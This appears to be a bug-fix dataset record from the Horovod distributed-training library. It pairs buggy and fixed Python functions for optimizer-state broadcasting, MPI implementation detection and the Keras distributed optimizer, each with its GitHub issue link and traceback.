# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.cpu().numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.cpu().numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
if pid not in state_dict["state"]:
# The param has not set requires_grad, so skip broadcast
continue
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
# Post-broadcast cleanup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
if p.requires_grad and id(p) not in state_dict["state"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.cpu().numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.cpu().numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
# Post-broadcast cleanup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
https://github.com/horovod/horovod/issues/1725
|
Traceback (most recent call last):
...
File ************
HVD.broadcast_optimizer_state(optimizer, root_rank=0)
File "/usr/local/lib/python3.7/dist-packages/horovod/torch/__init__.py", line 572, in broadcast_optimizer_state
param_state = state_dict['state'][pid]
KeyError: 140137585983888
|
KeyError
|
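The KeyError above (140137585983888 is a raw Python id() of a parameter tensor) happens because state_dict['state'] only holds entries for parameters the optimizer has actually updated; a parameter with requires_grad=False never receives a state entry, so indexing with its pid fails. The after_merge version guards both places: grad initialization (if p.requires_grad and id(p) not in state_dict['state']) and the broadcast loop (if pid not in state_dict['state']: continue). A minimal reproduction sketch under assumed conditions (the model and optimizer are illustrative, not taken from the issue; depending on the torch version, state keys are ids or indices):

import torch

model = torch.nn.Linear(4, 2)
model.bias.requires_grad_(False)  # frozen parameter: never gets optimizer state

opt = torch.optim.Adam(model.parameters(), lr=0.01)
model(torch.randn(1, 4)).sum().backward()
opt.step()  # Adam creates state only for parameters that received gradients

sd = opt.state_dict()
for group in sd["param_groups"]:
    for pid in group["params"]:
        # Without this guard (the line the fix adds), sd["state"][pid]
        # raises KeyError for the frozen parameter.
        if pid not in sd["state"]:
            continue
        param_state = sd["state"][pid]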
def _get_mpi_implementation_flags():
output = six.StringIO()
command = "mpirun --version"
try:
exit_code = safe_shell_exec.execute(command, stdout=output, stderr=output)
output_msg = output.getvalue()
except Exception:
print(traceback.format_exc(), file=sys.stderr)
return None
finally:
output.close()
if exit_code == 0:
if "Open MPI" in output_msg or "OpenRTE" in output_msg:
return list(_OMPI_FLAGS)
elif "IBM Spectrum MPI" in output_msg:
return list(_SMPI_FLAGS)
elif "MPICH" in output_msg:
return list(_MPICH_FLAGS)
print(
"Open MPI/Spectrum MPI/MPICH not found in output of mpirun --version.",
file=sys.stderr,
)
return None
else:
print("Was not able to run %s:\n%s" % (command, output_msg), file=sys.stderr)
return None
|
def _get_mpi_implementation_flags():
output = six.StringIO()
command = "mpirun --version"
try:
exit_code = safe_shell_exec.execute(command, stdout=output, stderr=output)
output_msg = output.getvalue()
except Exception:
print(traceback.format_exc(), file=sys.stderr)
return None
finally:
output.close()
if exit_code == 0:
if "Open MPI" in output_msg:
return list(_OMPI_FLAGS)
elif "IBM Spectrum MPI" in output_msg:
return list(_SMPI_FLAGS)
elif "MPICH" in output_msg:
return list(_MPICH_FLAGS)
print(
"Open MPI/Spectrum MPI/MPICH not found in output of mpirun --version.",
file=sys.stderr,
)
return None
else:
print("Was not able to run %s:\n%s" % (command, output_msg), file=sys.stderr)
return None
|
https://github.com/horovod/horovod/issues/1690
|
horovodrun -np 1 -H localhost:1 python pytorch_mnist.py
Open MPI not found in output of mpirun --version.
Traceback (most recent call last):
File "/opt/conda/bin/horovodrun", line 21, in <module>
run.run()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 448, in run
'horovodrun convenience script currently only supports '
Exception: horovodrun convenience script currently only supports Open MPI.
Choose one of:
1. Install Open MPI 4.0.0+ and re-install Horovod (use --no-cache-dir pip option).
2. Run distributed training script using the standard way provided by your MPI distribution (usually mpirun, srun, or jsrun).
root@3da487b92c3d:/horovod/examples# mpirun --version
mpirun.real (OpenRTE) 4.0.1
Report bugs to http://www.open-mpi.org/community/help/
|
Exception
|
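The Exception above is raised by the version probe, not by MPI itself: the container's mpirun is a wrapper that reports "mpirun.real (OpenRTE) 4.0.1", so the before_merge substring test for "Open MPI" rejects a genuine Open MPI installation. The after_merge check also accepts "OpenRTE". Detection reduces to substring matching on the mpirun --version output, as in this sketch (the returned labels stand in for the real flag lists):

def classify_mpi(version_output):
    # Mirrors the matching order of _get_mpi_implementation_flags above.
    if "Open MPI" in version_output or "OpenRTE" in version_output:
        return "openmpi"
    if "IBM Spectrum MPI" in version_output:
        return "spectrum"
    if "MPICH" in version_output:
        return "mpich"
    return None

assert classify_mpi("mpirun.real (OpenRTE) 4.0.1") == "openmpi"
assert classify_mpi("mpirun (Open MPI) 4.0.0") == "openmpi"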
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
if p.requires_grad and id(p) not in state_dict["state"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.cpu().numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.cpu().numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
# Post-broadcast cleanup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.cpu().numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.cpu().numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
    # Post-broadcast cleanup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
https://github.com/horovod/horovod/issues/1608
|
Traceback (most recent call last):
File "/.../mwe.py", line 30, in <module>
hvd.broadcast_optimizer_state(optimizer, root_rank=0)
File "/.../python2.7/dist-packages/horovod-0.16.1-py2.7-linux-x86_64.egg/horovod/torch/__init__.py", line 261, in broadcast_optimizer_state
super(optimizer.__class__, optimizer).step()
File "/.../torch/optim/sgd.py", line 106, in step
p.data.add_(-group['lr'], d_p)
RuntimeError: For integral input tensors, argument alpha must not be a floating point number.
|
RuntimeError
|
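The RuntimeError above fires during the dummy optimizer.step() used to materialize optimizer state: the before_merge version zero-initializes p.grad for every parameter in every group, so SGD then attempts p.data.add_(-group['lr'], d_p) even on tensors that should never be updated, and that call rejects a floating-point alpha on an integral tensor. Since only floating-point (and complex) tensors can have requires_grad=True, the after_merge guard p.requires_grad excludes integer-typed tensors automatically. A minimal sketch of the failing operation (values are illustrative; the keyword form below is the modern spelling of the positional call in the traceback):

import torch

p = torch.zeros(3, dtype=torch.long)    # an integral "parameter"
d_p = torch.zeros(3, dtype=torch.long)  # its zero-initialized fake gradient

try:
    p.add_(d_p, alpha=-0.01)  # same operation as SGD's weight update
except RuntimeError as e:
    print(e)  # "For integral input tensors, argument alpha must not be ..."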
def create_distributed_optimizer(
keras, optimizer, name, device_dense, device_sparse, compression, sparse_as_dense
):
class _DistributedOptimizer(keras.optimizers.Optimizer):
def __init__(self, **kwargs):
self._name = name or "Distributed%s" % self.__class__.__base__.__name__
self._device_dense = device_dense
self._device_sparse = device_sparse
self._compression = compression
self._sparse_as_dense = sparse_as_dense
self._get_gradients_used = False
super(self.__class__, self).__init__(**kwargs)
def get_gradients(self, loss, params):
"""
Compute gradients of all trainable variables.
See Optimizer.get_gradients() for more info.
        In DistributedOptimizer, get_gradients() is overridden to also
allreduce the gradients before returning them.
"""
self._get_gradients_used = True
gradients = super(self.__class__, self).get_gradients(loss, params)
if hvd.size() > 1:
averaged_gradients = []
with tf.name_scope(self._name + "_Allreduce"):
for grad in gradients:
if grad is not None:
if self._sparse_as_dense and isinstance(
grad, tf.IndexedSlices
):
grad = tf.convert_to_tensor(grad)
avg_grad = hvd.allreduce(
grad,
device_dense=self._device_dense,
device_sparse=self._device_sparse,
compression=self._compression,
)
averaged_gradients.append(avg_grad)
else:
averaged_gradients.append(None)
return averaged_gradients
else:
return gradients
def apply_gradients(self, *args, **kwargs):
if not self._get_gradients_used:
raise Exception(
"`apply_gradients()` was called without a call to "
"`get_gradients()`. If you're using TensorFlow 2.0, "
"please specify `experimental_run_tf_function=False` in "
"`compile()`."
)
return super(self.__class__, self).apply_gradients(*args, **kwargs)
# We dynamically create a new class that inherits from the optimizer that was passed in.
# The goal is to override get_gradients() method with an allreduce implementation.
# This class will have the same name as the optimizer it's wrapping, so that the saved
# model could be easily restored without Horovod.
cls = type(
optimizer.__class__.__name__,
(optimizer.__class__,),
dict(_DistributedOptimizer.__dict__),
)
return cls.from_config(optimizer.get_config())
|
def create_distributed_optimizer(
keras, optimizer, name, device_dense, device_sparse, compression, sparse_as_dense
):
class _DistributedOptimizer(keras.optimizers.Optimizer):
def __init__(
self,
name,
device_dense,
device_sparse,
compression,
sparse_as_dense,
config,
):
if name is None:
name = "Distributed%s" % self.__class__.__base__.__name__
self._name = name
self._device_dense = device_dense
self._device_sparse = device_sparse
self._compression = compression
self._sparse_as_dense = sparse_as_dense
self._get_gradients_used = False
super(self.__class__, self).__init__(**config)
def get_gradients(self, loss, params):
"""
Compute gradients of all trainable variables.
See Optimizer.get_gradients() for more info.
In DistributedOptimizer, get_gradients() is overridden to also
allreduce the gradients before returning them.
"""
self._get_gradients_used = True
gradients = super(self.__class__, self).get_gradients(loss, params)
if hvd.size() > 1:
averaged_gradients = []
with tf.name_scope(self._name + "_Allreduce"):
for grad in gradients:
if grad is not None:
if self._sparse_as_dense and isinstance(
grad, tf.IndexedSlices
):
grad = tf.convert_to_tensor(grad)
avg_grad = hvd.allreduce(
grad,
device_dense=self._device_dense,
device_sparse=self._device_sparse,
compression=self._compression,
)
averaged_gradients.append(avg_grad)
else:
averaged_gradients.append(None)
return averaged_gradients
else:
return gradients
def apply_gradients(self, *args, **kwargs):
if not self._get_gradients_used:
raise Exception(
"`apply_gradients()` was called without a call to "
"`get_gradients()`. If you're using TensorFlow 2.0, "
"please specify `experimental_run_tf_function=False` in "
"`compile()`."
)
return super(self.__class__, self).apply_gradients(*args, **kwargs)
@classmethod
def from_config(cls, cfg):
return cls(
name, device_dense, device_sparse, compression, sparse_as_dense, cfg
)
# We dynamically create a new class that inherits from the optimizer that was passed in.
# The goal is to override get_gradients() method with an allreduce implementation.
# This class will have the same name as the optimizer it's wrapping, so that the saved
# model could be easily restored without Horovod.
cls = type(
optimizer.__class__.__name__,
(optimizer.__class__,),
dict(_DistributedOptimizer.__dict__),
)
return cls(
name,
device_dense,
device_sparse,
compression,
sparse_as_dense,
optimizer.get_config(),
)
|
https://github.com/horovod/horovod/issues/1573
|
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 541, in __getattribute__
[1,0]<stderr>: return super(OptimizerV2, self).__getattribute__(name)
[1,0]<stderr>:AttributeError: 'Adam' object has no attribute 'lr'
[1,0]<stderr>:
[1,0]<stderr>:During handling of the above exception, another exception occurred:
[1,0]<stderr>:
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "tensorflow_keras_mnist.py", line 94, in <module>
[1,0]<stderr>: mnist_model.fit(dataset, steps_per_epoch=500 // hvd.size(), callbacks=callbacks, epochs=24, verbose=verbose)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training.py", line 728, in fit
[1,0]<stderr>: use_multiprocessing=use_multiprocessing)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training_generator.py", line 693, in fit
[1,0]<stderr>: steps_name='steps_per_epoch')
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training_generator.py", line 196, in model_iteration
[1,0]<stderr>: callbacks._call_begin_hook(mode)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/callbacks.py", line 249, in _call_begin_hook
[1,0]<stderr>: self.on_train_begin()
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/callbacks.py", line 365, in on_train_begin
[1,0]<stderr>: callback.on_train_begin(logs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/horovod/_keras/callbacks.py", line 137, in on_train_begin
[1,0]<stderr>: self.initial_lr = self.backend.get_value(self.model.optimizer.lr)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 550, in __getattribute__
[1,0]<stderr>: return self._get_hyper(name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 527, in _get_hyper
[1,0]<stderr>: self._create_hypers()
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 643, in _create_hypers
[1,0]<stderr>: aggregation=tf_variables.VariableAggregation.ONLY_FIRST_REPLICA)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 805, in add_weight
[1,0]<stderr>: aggregation=aggregation)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/training/tracking/base.py", line 744, in _add_variable_with_custom_getter
[1,0]<stderr>: **kwargs_for_getter)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/base_layer_utils.py", line 139, in make_variable
[1,0]<stderr>: shape=variable_shape if variable_shape else None)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 258, in __call__
[1,0]<stderr>: return cls._variable_v1_call(*args, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 219, in _variable_v1_call
[1,0]<stderr>: shape=shape)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 197, in <lambda>
[1,0]<stderr>: previous_getter = lambda **kwargs: default_variable_creator(None, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variable_scope.py", line 2507, in default_variable_creator
[1,0]<stderr>: shape=shape)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 262, in __call__
[1,0]<stderr>: return super(VariableMetaclass, cls).__call__(*args, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/resource_variable_ops.py", line 1406, in __init__
[1,0]<stderr>: distribute_strategy=distribute_strategy)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/resourc[1,0]<stderr>:e_variable_ops.py", line 1538, in _init_from_args
[1,0]<stderr>: name="initial_value", dtype=dtype)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1184, in convert_to_tensor
[1,0]<stderr>: return convert_to_tensor_v2(value, dtype, preferred_dtype, name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1242, in convert_to_tensor_v2
[1,0]<stderr>: as_ref=False)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1296, in internal_convert_to_tensor
[1,0]<stderr>: ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 286, in _constant_tensor_conversion_function
[1,0]<stderr>: return constant(v, dtype=dtype, name=name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 227, in constant
[1,0]<stderr>: allow_broadcast=True)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 235, in _constant_impl
[1,0]<stderr>: t = convert_to_eager_tensor(value, ctx, dtype)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 96, in convert_to_eager_tensor
[1,0]<stderr>: return ops.EagerTensor(value, ctx.device_name, dtype)
[1,0]<stderr>:ValueError: Attempt to convert a value ({'class_name': 'ExponentialDecay', 'config': {'initial_learning_rate': 0.001, 'decay_steps': 100000, 'decay_rate': 0.96, 'staircase': True, 'name': None}}) with an unsupported type (<class 'dict'>) to a Tensor.
[1,0]<stderr>:Exception ignored in: <function _RandomSeedGeneratorDeleter.__del__ at 0x7f7dec944a70>
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/data/ops/dataset_ops.py", line 3009, in __del__
[1,0]<stderr>:AttributeError: 'NoneType' object has no attribute 'device'
--------------------------------------------------------------------------
Primary job terminated normally, but 1 process returned
a non-zero exit code. Per user-direction, the job has been aborted.
--------------------------------------------------------------------------
|
AttributeError
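A minimal sketch of the dynamic-subclass trick used in create_distributed_optimizer above: type() builds a class at runtime that carries the wrapped optimizer's name but the wrapper's methods. All names below are illustrative stand-ins:

class _Base(object):       # stand-in for the common optimizer base class
    pass

class _Wrapper(_Base):     # stand-in for _DistributedOptimizer
    def describe(self):
        return "wrapped %s" % self.__class__.__name__

class Adam(_Base):         # stand-in for the optimizer class being wrapped
    pass

cls = type(Adam.__name__, (Adam,), dict(_Wrapper.__dict__))
print(cls().describe())    # -> "wrapped Adam"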
|
def __init__(self, **kwargs):
self._name = name or "Distributed%s" % self.__class__.__base__.__name__
self._device_dense = device_dense
self._device_sparse = device_sparse
self._compression = compression
self._sparse_as_dense = sparse_as_dense
self._get_gradients_used = False
super(self.__class__, self).__init__(**kwargs)
|
def __init__(
self, name, device_dense, device_sparse, compression, sparse_as_dense, config
):
if name is None:
name = "Distributed%s" % self.__class__.__base__.__name__
self._name = name
self._device_dense = device_dense
self._device_sparse = device_sparse
self._compression = compression
